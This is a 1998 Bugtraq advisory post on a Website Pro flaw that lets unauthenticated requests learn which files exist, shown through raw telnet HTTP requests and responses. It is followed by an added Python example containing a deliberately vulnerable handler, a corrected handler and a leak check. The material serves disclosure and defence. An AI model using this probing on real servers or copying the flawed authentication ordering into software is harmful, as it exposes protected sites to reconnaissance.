Bugtraq mailing list archives

Flaw in HTTP-Authentication in O'Reilly Website Pro


From: bk () arena cwnet com (BarKode)
Date: Fri, 24 Apr 1998 03:14:02 +0000


Greetings...

        I went to download a file I'd stashed away on a machine at work
running Website Pro 1.1h, with HTTP-Authentication required to
access the site at all.  I mistyped the name and to my astonishment
got a 404 error. This only surprised me because I had just started
the browser, and had not yet been prompted for a username and
password (Authentication-basic style).

Problem: You can remotely check for existence of files and
directory structures on a machine running Web Site Pro 1.1.

Observe: Here we will try to access index.html, a file which exists on
the protected host.
thunder:~$ telnet protected.host.com 80
Trying 1.2.3.4...
Connected to protected.host.com.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Date: Fri, 24 Apr 1998 09:33:46 GMT
Server: WebSitePro/1.1h
Accept-ranges: bytes
WWW-Authenticate: Basic realm="Web Server"
Content-length: 156


<HTML><HEAD><TITLE>Authorization Required</TITLE></HEAD>
<BODY><H1>Authorization Required</H1>
Authentication (Basic) failed or was missing.
</BODY></HTML>
Connection closed by foreign host.

******

Now we try to access a file that does *not* exist.

thunder:~$ telnet protected.host.com 80
Trying 1.2.3.4...
Connected to protected.host.com.
Escape character is '^]'.
GET /nothere.html HTTP/1.0

HTTP/1.0 404 Not Found
Date: Fri, 24 Apr 1998 09:35:42 GMT
Server: WebSitePro/1.1h
Accept-ranges: bytes
Content-type: text/html
Content-length: 207


<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY><H1>404 Not Found</H1>
The requested URL was not found on this
server:<P><CODE>/nothere.html<P>(C:/WebS
ite/htdocs/nothere.html)</CODE><P> </BODY></HTML>
Connection closed by foreign host.

*****

No mention whatsoever of Authentication, the server spewed forth a
404 document, gleefully stating the file we want isn't there. The
same situation posed under Apache 1.2.5 returns a '401 Unauthorized'
in either situation.

Contacted O'Reilly, awaiting response....

-Matt
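An added example, not part of the original post and not Website Pro's code: two in-process WSGI handlers that differ only in whether the Basic check runs before or after the path is resolved, plus a check that flags the first ordering because its unauthenticated status codes depend on the path. The document root, credentials and all function names are constructed for illustration.

```python
import base64, hmac
from wsgiref.util import setup_testing_defaults

DOCROOT = {"/index.html": b"<html>members only</html>"}  # constructed content
USERS = {"matt": "example-pass"}                          # constructed credentials

def authorized(environ):
    """True only for a well-formed Basic header naming a known user and password."""
    scheme, _, blob = environ.get("HTTP_AUTHORIZATION", "").partition(" ")
    try:
        user, _, pw = base64.b64decode(blob).decode().partition(":")
    except ValueError:  # malformed base64 or non-UTF-8 bytes
        return False
    return (scheme.lower() == "basic" and user in USERS
            and hmac.compare_digest(USERS[user].encode(), pw.encode()))

def challenge(start_response):
    start_response("401 Unauthorized", [("WWW-Authenticate", 'Basic realm="Web Server"')])
    return [b"Authorization Required"]

def serve(environ, start_response):
    body = DOCROOT.get(environ["PATH_INFO"])
    if body is None:
        start_response("404 Not Found", [("Content-Type", "text/plain")])
        return [b"Not Found"]  # no filesystem path echoed back
    start_response("200 OK", [("Content-Type", "text/html")])
    return [body]

def lookup_then_auth(environ, start_response):
    """Ordering matching the post: only paths that resolve are challenged."""
    if environ["PATH_INFO"] in DOCROOT and not authorized(environ):
        return challenge(start_response)
    return serve(environ, start_response)

def auth_then_lookup(environ, start_response):
    """Corrected ordering: authenticate before the path is resolved at all."""
    if not authorized(environ):
        return challenge(start_response)
    return serve(environ, start_response)

def statuses(app, paths, authorization=""):
    """Call the WSGI app in-process and return {path: status line}."""
    result = {}
    for path in paths:
        environ = {"PATH_INFO": path, "HTTP_AUTHORIZATION": authorization}
        setup_testing_defaults(environ)
        app(environ, lambda status, headers, p=path: result.update({p: status}))
    return result

def leaks_existence(app, paths):
    """True if unauthenticated responses differ by path (status acts as an oracle)."""
    return len(set(statuses(app, paths).values())) > 1
```

Calling `leaks_existence` with one path known to exist and one known to be absent works as a regression test for any handler that is supposed to sit entirely behind authentication.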


